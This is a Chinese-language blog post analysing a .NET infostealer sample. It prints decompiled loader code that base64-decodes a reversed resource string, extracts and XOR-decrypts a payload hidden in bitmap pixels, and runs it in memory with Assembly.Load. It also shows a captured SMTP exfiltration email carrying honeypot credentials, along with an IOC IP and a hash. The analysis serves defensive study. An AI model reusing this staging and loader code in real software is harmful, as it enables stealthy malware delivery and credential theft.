某cs读取资源文件样本执行分析
继续学习样本分析
原YouTube视频分析:https://www.youtube.com/watch?v=deG_-5opR30
样本地址:https://app.any.run/tasks/6cdbb3ea-a272-47d5-b01e-0a41a1ae16f3/
分析过程
下载下来发现是.NET直接丢Dnspy反编译
跟随入口点
using System;
using System.Windows.Forms;
namespace WinFormsFirstOne
{
// Token: 0x02000013 RID: 19
internal static class Program
{
// Token: 0x06000096 RID: 150 RVA: 0x000068AA File Offset: 0x00004AAA
[STAThread]
private static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false); //某些控件上定义的属性设置应用程序范围的默认值
Application.Run(new Form1());
}
}
}
跟随第一个函数EnableVisualStyles
后续跟踪:
public static void EnableVisualStyles()
{
string text = null;
new FileIOPermission(PermissionState.None) //申请权限
{
AllFiles = FileIOPermissionAccess.PathDiscovery //访问路径本身中的信息。这有助于保护路径中的敏感信息,例如用户名,以及路径中显示的有关目录结构的信息。此值不授予对路径表示的文件或文件夹的访问权限。
}.Assert(); //调用此方法的代码访问受权限需求保护的资源
try
{
text = typeof(Application).Assembly.Location; //读取的资源文件内容
}
finally
{
CodeAccessPermission.RevertAssert();
}
if (text != null)
{
Application.EnableVisualStylesInternal(text, 101);
}
}
private static void EnableVisualStylesInternal(string assemblyFileName, int nativeResourceID) //EnableVisualStylesInternal函数翻译启用视觉样式内部
{
Application.useVisualStyles = UnsafeNativeMethods.ThemingScope.CreateActivationContext(assemblyFileName, nativeResourceID);
}
////////////////////////
public static bool CreateActivationContext(string dllPath, int nativeResourceManifestID) //native Resource Manifest ID(本机资源清单ID)
{
Type typeFromHandle = typeof(UnsafeNativeMethods.ThemingScope);
bool result;
lock (typeFromHandle)
{
if (!UnsafeNativeMethods.ThemingScope.contextCreationSucceeded && OSFeature.Feature.IsPresent(OSFeature.Themes))
{
UnsafeNativeMethods.ThemingScope.enableThemingActivationContext = default(UnsafeNativeMethods.ThemingScope.ACTCTX);
UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.cbSize = Marshal.SizeOf(typeof(UnsafeNativeMethods.ThemingScope.ACTCTX));
UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.lpSource = dllPath;
UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.lpResourceName = (IntPtr)nativeResourceManifestID;
UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.dwFlags = 8U;
UnsafeNativeMethods.ThemingScope.hActCtx = UnsafeNativeMethods.ThemingScope.CreateActCtx(ref UnsafeNativeMethods.ThemingScope.enableThemingActivationContext); // CreateActCtx函数创建一个激活上下文
UnsafeNativeMethods.ThemingScope.contextCreationSucceeded = (UnsafeNativeMethods.ThemingScope.hActCtx != new IntPtr(-1));
}
result = UnsafeNativeMethods.ThemingScope.contextCreationSucceeded;
}
return result;
}
看完完全不知道真正的东西,返回到入口点查看new From1。发现只是实例化各种窗口的,完全没有有用信息
在一筹莫展的时候,跟着视频走。发现是直接分析资源文件处理函数
跟随到资源文件,可以看到定义的SAS变量
跟随Rate函数(以后找不到函数被使用,可以直接Dnspy对着哪一行右键”分析”)
分析如下:
using System;
namespace WinFormsFirstOne
{
// Token: 0x02000009 RID: 9
internal class Castle
{
// Token: 0x04000032 RID: 50
public static string Ir = "cnJCh";
// Token: 0x04000033 RID: 51
public static string Iq = "HvXUw";
// Token: 0x04000034 RID: 52
public static string Le = "Load";
}
}
InvokeMethod = 256,
public static string Select(string s)
{
char[] array = s.ToCharArray();
Array.Reverse(array); //反转数组
return new string(array);
}
// Token: 0x0600006C RID: 108 RVA: 0x00004BD0 File Offset: 0x00002DD0
public string Rate(object[] io)
{
byte[] array = Convert.FromBase64String(FarmDestination.Select(Resources.SAS.Replace("Quotes_on_Life", "A"))); //base64解码
Assembly assembly = (Assembly)Type.GetType("System@@@@@^Reflection@@@@@^Assembly".Replace("@@@@@^", ".")).InvokeMember(Castle.Le, BindingFlags.InvokeMethod, null, null, new object[]
{
array
}); //调用公开静态函数(加载解码的base64) Assembly assembly = (Assembly)Type.GetType("System.Reflection.Assembly").InvokeMember("Load",256,null,null,new object[]){array}
MethodInfo o = (MethodInfo)LateBinding.LateGet(assembly.GetType("Dژ家ycحElj她s.的Fڵ是rn太Wظ"), null, "GetMethod", new object[]
{
"执ZciGڤjPز"
}, null, null); //获取"Dژ家ycحElj她s.的Fڵ是rn太Wظ".执ZciGڤjP调用结果
LateBinding.LateGet(o, null, FarmDestination.Select("ekovnI"), new object[]
{
null,
io
}, null, null);
return "Biara";
}
}
}
将SAS变量进行base64解码
1.将Quotes_on_Life替换为A
2.反转base64
3.base64解码
保存到文件,继续拖到dnspy分析,跟踪调用的 执ZciGڤjPز函数。发现是调用了几个函数后远程加载
跟踪هmyڕDئفTH函数
1.获取入口函数程序集所在的文件
2.创建一个新的ResourceManager
3.返回了个Bitmap
跟踪بظxئ家g希顾太太Bحه函数
(貌似是解密的算法)
跟踪c商ەڤG首首rءsە函数
从gzip流读取数据返回
一般这种情况需要断点Assembly.Load才能获取解密后的结果。然后作者把这个dump出来的文件,直接丢de4dot.exe然后就得到了解密的结果
最后确定入口点在(smethod_4函数):
using System;
using System.Collections.Generic;
using System.Drawing;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Resources;
using System.Text;
using System.Threading;
namespace ns1
{
// Token: 0x02000002 RID: 2
public class GClass0
{
// Token: 0x06000001 RID: 1 RVA: 0x00002064 File Offset: 0x00000264
public static byte[] smethod_0(byte[] byte_0)
{
byte[] result;
using (MemoryStream memoryStream = new MemoryStream(byte_0))
{
byte[] array = new byte[4];
memoryStream.Read(array, 0, 4);
int num = BitConverter.ToInt32(array, 0);
using (GZipStream gzipStream = new GZipStream(memoryStream, CompressionMode.Decompress))
{
byte[] array2 = new byte[num];
gzipStream.Read(array2, 0, num);
result = array2;
}
}
return result;
}
// Token: 0x06000002 RID: 2 RVA: 0x000020E4 File Offset: 0x000002E4
public static byte[] smethod_1(byte[] byte_0, string string_1) //xor解密
{
byte[] bytes = Encoding.ASCII.GetBytes(string_1); //密钥
int num = (int)(byte_0[byte_0.Length - 1] ^ 112);
byte[] array = new byte[byte_0.Length + 1];
int num2 = 0;
for (int i = 0; i <= byte_0.Length - 1; i++)
{
array[i] = (byte)((int)byte_0[i] ^ num ^ (int)bytes[num2]);
if (num2 == string_1.Length - 1)
{
num2 = 0;
}
else
{
num2++;
}
}
Array.Resize<byte>(ref array, byte_0.Length - 1);
return array;
}
// Token: 0x06000003 RID: 3 RVA: 0x00002164 File Offset: 0x00000364
private static byte[] smethod_2(Bitmap bitmap_0)
{
List<byte> list = new List<byte>();
checked
{
int num = bitmap_0.Width - 1;
for (int i = 0; i <= num; i++)
{
int num2 = bitmap_0.Height - 1;
for (int j = 0; j <= num2; j++)
{
Color pixel = bitmap_0.GetPixel(i, j);
if (pixel != Color.FromArgb(0, 0, 0, 0))
{
list.InsertRange(list.Count, new byte[]
{
pixel.R,
pixel.G,
pixel.B
});
}
}
}
return list.ToArray();
}
}
// Token: 0x06000004 RID: 4 RVA: 0x00002208 File Offset: 0x00000408
public static Bitmap smethod_3(string string_1, string string_2)
{
ResourceManager resourceManager = new ResourceManager(string_2 + ".Properties.Resources", Assembly.GetEntryAssembly());
return (Bitmap)resourceManager.GetObject(string_1);
}
// Token: 0x06000005 RID: 5 RVA: 0x0000223C File Offset: 0x0000043C
public static void smethod_4(string string_1, string string_2, string string_3)
{
Thread.Sleep(38000);
byte[] rawAssembly = GClass0.smethod_0(GClass0.smethod_1(GClass0.smethod_2(GClass0.smethod_3(string_1, string_3)), string_2));
Assembly.Load(rawAssembly).EntryPoint.Invoke(0, null);
Environment.Exit(0);
}
// Token: 0x04000001 RID: 1
private string string_0 = "You will face many defeats in life, but never let yourself be defeated.";
}
}
由于加密太多,过于繁琐。无法看到源代码静态分析执行了什么。只能丢沙箱了看看执行了什么,或者在运行的时候dump .NET内存
(最后是释放了个exe在执行)
作者使用了MegaDumper工具在运行的时候dump下来的exe:https://github.com/CodeCracker-Tools/MegaDumper
最后丢dnspy得到原始的代码
using System;
using System.EnterpriseServices;
using System.Globalization;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Runtime.Remoting;
using System.Text;
using System.Threading;
// Token: 0x02000003 RID: 3
[ComVisible(false)]
public class RegSvcs
{
// Token: 0x06000005 RID: 5
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern int SearchPath(string path, string fileName, string extension, int numBufferChars, StringBuilder buffer, int[] filePart);
// Token: 0x06000007 RID: 7 RVA: 0x0000209C File Offset: 0x0000029C
private static RegistrationHelper GetRegistrationHelper(bool bCreateAppDomain, out AppDomain domain)
{
RegistrationHelper result = null;
domain = null;
if (!bCreateAppDomain)
{
result = new RegistrationHelper();
}
else
{
string directoryName = Path.GetDirectoryName(RegSvcs.regConfig.AssemblyFile);
domain = AppDomain.CreateDomain("RegSvcs", null, new AppDomainSetup
{
ApplicationBase = directoryName
});
if (domain != null)
{
ObjectHandle objectHandle = domain.CreateInstance(typeof(RegistrationHelper).Assembly.FullName, typeof(RegistrationHelper).FullName);
if (objectHandle != null)
{
result = (RegistrationHelper)objectHandle.Unwrap();
}
}
}
return result;
}
// Token: 0x06000008 RID: 8 RVA: 0x00002124 File Offset: 0x00000324
private static string FindAssembly(string name)
{
StringBuilder stringBuilder = new StringBuilder(261);
if (RegSvcs.SearchPath(null, name, null, stringBuilder.Capacity + 1, stringBuilder, null) == 0)
{
return null;
}
return stringBuilder.ToString();
}
// Token: 0x06000009 RID: 9 RVA: 0x00002158 File Offset: 0x00000358
private static bool IsAssemblyInGAC(string name)
{
try
{
Assembly assembly = Assembly.Load(name);
}
catch
{
return false;
}
return true;
}
// Token: 0x0600000A RID: 10 RVA: 0x00002188 File Offset: 0x00000388
[MTAThread]
public static int Main(string[] args)
{
int result;
try
{
result = RegSvcs.UnsafeMain(args);
}
catch
{
result = 1;
}
return result;
}
// Token: 0x0600000B RID: 11 RVA: 0x000021B4 File Offset: 0x000003B4
public static int UnsafeMain(string[] args)
{
AppDomain appDomain = null;
RegSvcs.DoConsoleInitialization();
try
{
RegSvcs.ParseArguments(args); //根据命令行做出对应的函数处理
if (RegSvcs.logoOutput)
{
RegSvcs.PrintLogo();
}
if (RegSvcs.regConfig.AssemblyFile != null)
{
string text = RegSvcs.FindAssembly(RegSvcs.regConfig.AssemblyFile);
RegistrationHelper registrationHelper;
if (text != null)
{
RegSvcs.regConfig.AssemblyFile = text;
registrationHelper = RegSvcs.GetRegistrationHelper(true, out appDomain);
}
else
{
if (!RegSvcs.IsAssemblyInGAC(RegSvcs.regConfig.AssemblyFile))
{
throw new RegistrationException(Resource.FormatString("RegSvcs_AssemblyNotFound", RegSvcs.regConfig.AssemblyFile));
}
registrationHelper = RegSvcs.GetRegistrationHelper(false, out appDomain);
}
if (RegSvcs.uninstallApplication)
{
registrationHelper.UninstallAssemblyFromConfig(ref RegSvcs.regConfig);
if (RegSvcs.successOutput)
{
Console.WriteLine(Resource.FormatString("RegSvcs_UninstallSuccess", RegSvcs.regConfig.AssemblyFile));
}
}
else
{
registrationHelper.InstallAssemblyFromConfig(ref RegSvcs.regConfig);
if (RegSvcs.successOutput)
{
if (RegSvcs.regConfig.Partition != null && RegSvcs.regConfig.Application != null)
{
Console.WriteLine(Resource.FormatString("RegSvcs_InstallSuccess2", new string[]
{
RegSvcs.regConfig.AssemblyFile,
RegSvcs.regConfig.Application,
RegSvcs.regConfig.Partition,
RegSvcs.regConfig.TypeLibrary
}));
}
else if (RegSvcs.regConfig.Application != null)
{
Console.WriteLine(Resource.FormatString("RegSvcs_InstallSuccess", RegSvcs.regConfig.AssemblyFile, RegSvcs.regConfig.Application, RegSvcs.regConfig.TypeLibrary));
}
else
{
Console.WriteLine(Resource.FormatString("RegSvcs_NoServicedComponents"));
}
}
}
}
}
catch (UsageException ex)
{
if (RegSvcs.logoOutput)
{
RegSvcs.PrintLogo();
}
Console.WriteLine(ex.Message);
return ex.ReturnCode;
}
catch (RegistrationException ex2)
{
string msg;
if (RegSvcs.uninstallApplication)
{
msg = Resource.FormatString("RegSvcs_UninstallError");
}
else
{
msg = Resource.FormatString("RegSvcs_InstallError");
}
RegSvcs.DumpExceptions(msg, ex2, false);
if (ex2.InnerException != null)
{
if (ex2.InnerException is COMException)
{
COMException ex3 = (COMException)ex2.InnerException;
if (ex3.ErrorCode != 0)
{
return ex3.ErrorCode;
}
return 1;
}
}
else if (ex2.ErrorInfo != null)
{
foreach (RegistrationErrorInfo registrationErrorInfo in ex2.ErrorInfo)
{
if (registrationErrorInfo.ErrorCode != 0)
{
return registrationErrorInfo.ErrorCode;
}
}
}
return 1;
}
catch (COMException ex4)
{
RegSvcs.DumpExceptions(Resource.FormatString("RegSvcs_CatalogError"), ex4, false);
if (ex4.ErrorCode != 0)
{
return ex4.ErrorCode;
}
return 1;
}
catch (Exception e)
{
RegSvcs.DumpExceptions(Resource.FormatString("RegSvcs_UnknownError"), e, true);
return 1;
}
finally
{
if (appDomain != null)
{
AppDomain.Unload(appDomain);
}
}
return 0;
}
// Token: 0x0600000C RID: 12 RVA: 0x000024FC File Offset: 0x000006FC
private static void DoConsoleInitialization()
{
Thread.CurrentThread.CurrentUICulture = CultureInfo.CurrentUICulture.GetConsoleFallbackUICulture(); //当默认的图形用户界面区域不合适时,获取适合控制台应用程序的备用用户界面区域
if (Console.OutputEncoding.CodePage != 65001 && Console.OutputEncoding.CodePage != Thread.CurrentThread.CurrentUICulture.TextInfo.OEMCodePage && Console.OutputEncoding.CodePage != Thread.CurrentThread.CurrentUICulture.TextInfo.ANSICodePage) //控制台编码不为UTF-8当前线程页面代码不为xxx则设置
{
Thread.CurrentThread.CurrentUICulture = new CultureInfo("en-US"); //设置区域为en-us
}
}
// Token: 0x0600000D RID: 13 RVA: 0x00002584 File Offset: 0x00000784
private static void DumpExceptions(string msg, Exception e, bool ename)
{
Console.WriteLine("\n" + msg);
int num = 1;
while (e != null)
{
if (ename || e.Message == null || e.Message.Length == 0)
{
Console.WriteLine(string.Concat(new object[]
{
num,
": ",
e.GetType().FullName,
" - ",
e.Message
}));
}
else
{
Console.WriteLine(num + ": " + e.Message);
}
if (e is RegistrationException)
{
RegistrationErrorInfo[] errorInfo = ((RegistrationException)e).ErrorInfo;
if (errorInfo != null)
{
foreach (RegistrationErrorInfo registrationErrorInfo in errorInfo)
{
if (registrationErrorInfo.MinorRef.ToLower(CultureInfo.InvariantCulture) != "<invalid>")
{
Console.WriteLine(string.Concat(new string[]
{
" ",
registrationErrorInfo.Name,
".",
registrationErrorInfo.MinorRef,
": ",
registrationErrorInfo.ErrorString
}));
}
else
{
Console.WriteLine(" " + registrationErrorInfo.Name + ": " + registrationErrorInfo.ErrorString);
}
}
}
}
num++;
e = e.InnerException;
}
}
// Token: 0x0600000E RID: 14 RVA: 0x000026EE File Offset: 0x000008EE
private static void PrintLogo()
{
Console.WriteLine(Resource.FormatString("RegSvcs_CopyrightMsg", "4.7.3062.0", CommonResStrings.CopyrightForCmdLine));
}
// Token: 0x0600000F RID: 15 RVA: 0x0000270C File Offset: 0x0000090C
private static bool IsArgument(string arg, string check)
{
string b = arg.ToLower(CultureInfo.InvariantCulture);
return "/" + check == b || "-" + check == b;
}
// Token: 0x06000010 RID: 16 RVA: 0x0000274C File Offset: 0x0000094C
private static bool IsPrefixArgument(string arg, string check, ref string prefix)
{
string text = arg.ToLower(CultureInfo.InvariantCulture);
prefix = null;
if (arg.StartsWith("/" + check + ":", StringComparison.Ordinal) || arg.StartsWith("-" + check + ":", StringComparison.Ordinal))
{
if (arg.Length > check.Length + 2)
{
prefix = arg.Substring(check.Length + 2);
}
return true;
}
return RegSvcs.IsArgument(arg, check);
}
// Token: 0x06000011 RID: 17 RVA: 0x000027C4 File Offset: 0x000009C4
private static void ParseArguments(string[] args) //根据命令行参数做出对应的函数处理
{
RegSvcs.regConfig.InstallationFlags = (InstallationFlags.FindOrCreateTargetApplication | InstallationFlags.ReconfigureExistingApplication | InstallationFlags.ReportWarningsToConsole);
RegSvcs.logoOutput = true;
RegSvcs.successOutput = true;
RegSvcs.uninstallApplication = false;
if (args.Length < 1)
{
throw new UsageException(0);
}
int i;
for (i = 0; i < args.Length; i++)
{
string text = null;
if (RegSvcs.IsArgument(args[i], "?") || RegSvcs.IsArgument(args[i], "help"))
{
throw new UsageException(0);
}
if (RegSvcs.IsArgument(args[i], "c"))
{
RegSvcs.regConfig.InstallationFlags |= InstallationFlags.CreateTargetApplication;
RegSvcs.regConfig.InstallationFlags &= ~InstallationFlags.FindOrCreateTargetApplication;
}
else if (RegSvcs.IsArgument(args[i], "fc"))
{
RegSvcs.regConfig.InstallationFlags |= InstallationFlags.FindOrCreateTargetApplication;
}
else if (RegSvcs.IsArgument(args[i], "exapp"))
{
RegSvcs.regConfig.InstallationFlags &= ~(InstallationFlags.CreateTargetApplication | InstallationFlags.FindOrCreateTargetApplication);
}
else if (RegSvcs.IsArgument(args[i], "extlb"))
{
RegSvcs.regConfig.InstallationFlags |= InstallationFlags.ExpectExistingTypeLib;
}
else if (RegSvcs.IsPrefixArgument(args[i], "tlb", ref text))
{
RegSvcs.regConfig.TypeLibrary = text;
}
else if (RegSvcs.IsArgument(args[i], "reconfig"))
{
RegSvcs.regConfig.InstallationFlags |= InstallationFlags.ReconfigureExistingApplication;
}
else if (RegSvcs.IsArgument(args[i], "noreconfig"))
{
RegSvcs.regConfig.InstallationFlags &= ~InstallationFlags.ReconfigureExistingApplication;
}
else if (RegSvcs.IsArgument(args[i], "nologo"))
{
RegSvcs.logoOutput = false;
}
else if (RegSvcs.IsArgument(args[i], "quiet"))
{
RegSvcs.regConfig.InstallationFlags &= ~InstallationFlags.ReportWarningsToConsole;
RegSvcs.logoOutput = false;
RegSvcs.successOutput = false;
}
else if (RegSvcs.IsArgument(args[i], "u"))
{
RegSvcs.uninstallApplication = true;
}
else if (RegSvcs.IsArgument(args[i], "componly"))
{
RegSvcs.regConfig.InstallationFlags |= InstallationFlags.ConfigureComponentsOnly;
}
else if (RegSvcs.IsPrefixArgument(args[i], "appname", ref text))
{
RegSvcs.regConfig.Application = text;
}
else if (RegSvcs.IsPrefixArgument(args[i], "parname", ref text))
{
RegSvcs.regConfig.Partition = text;
}
else if (RegSvcs.IsPrefixArgument(args[i], "appdir", ref text))
{
RegSvcs.regConfig.ApplicationRootDirectory = text;
}
else
{
if (args[i].StartsWith("/", StringComparison.Ordinal) || args[i].StartsWith("-", StringComparison.Ordinal))
{
throw new UsageException(1, Resource.FormatString("RegSvcs_InvalidOption", args[i]));
}
break;
}
}
if (i > args.Length)
{
throw new UsageException(1);
}
int num = args.Length - i;
if (num == 0)
{
throw new UsageException(1, Resource.FormatString("RegSvcs_NotEnoughArgs"));
}
if (num == 1)
{
RegSvcs.regConfig.AssemblyFile = args[i];
return;
}
if (num == 2)
{
RegSvcs.regConfig.AssemblyFile = args[i];
RegSvcs.regConfig.Application = args[i + 1];
RegSvcs.regConfig.TypeLibrary = null;
return;
}
if (num == 3)
{
RegSvcs.regConfig.AssemblyFile = args[i];
RegSvcs.regConfig.Application = args[i + 1];
RegSvcs.regConfig.TypeLibrary = args[i + 2];
return;
}
throw new UsageException(1, Resource.FormatString("RegSvcs_ToManyArgs"));
}
// Token: 0x04000002 RID: 2
private const int MAX_PATH = 260;
// Token: 0x04000003 RID: 3
private static RegistrationConfig regConfig = new RegistrationConfig();
// Token: 0x04000004 RID: 4
private static bool logoOutput;
// Token: 0x04000005 RID: 5
private static bool successOutput;
// Token: 0x04000006 RID: 6
private static bool uninstallApplication;
}
看了一下连接信息:
先发送了一个Auth的请求头进行验证
解码:info@stankovic.hr
验证成功后会收集本机信息进行上传(发送到邮箱)
MIME-Version: 1.0
From: info@stankovic.hr
To: info@stankovic.hr
Date: 28 Jul 2020 20:46:04 +0100
Subject: PW_admin/USER-PC
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
Time: 07/28/2020 20:45:57
User Name: admin
Computer Name: U=
SER-PC
OSFullName: Microsoft Windows 7 Professional
CPU: I=
ntel(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 3583.61 MB
<hr>=
URL:192.168.1.1
0D=0AUsername:honey@pot.com
0D=0APassword=
:honeypass356
0D=0AApplication:Outlook
0D=0A<hr>=0D=0AURL=
:https://m.facebook.com/
0D=0AUsername:honey@pot.com
0D=0A=
Password:honeypass356
0D=0AApplication:Chrome
0D=0A<hr>=0D=0A=
URL:https://m.facebook.com
0D=0AUsername:honey@pot.com
0D=0A=
Password:honeypass356
0D=0AApplication:Firefox
0D=0A<hr>=0D=0A
还有一些功能需要详细分析,感觉需要HOOK才能更好的分析….
MD5:1A25E75693B99AD09E55AEA29C6F2775
IOC:
89.201.175.36
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:某cs读取资源文件样本执行分析
本文作者:九世
发布时间:2021-04-14, 08:27:03
最后更新:2021-04-14, 08:44:35
原始链接:http://jiushill.github.io/posts/a98e0b02.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。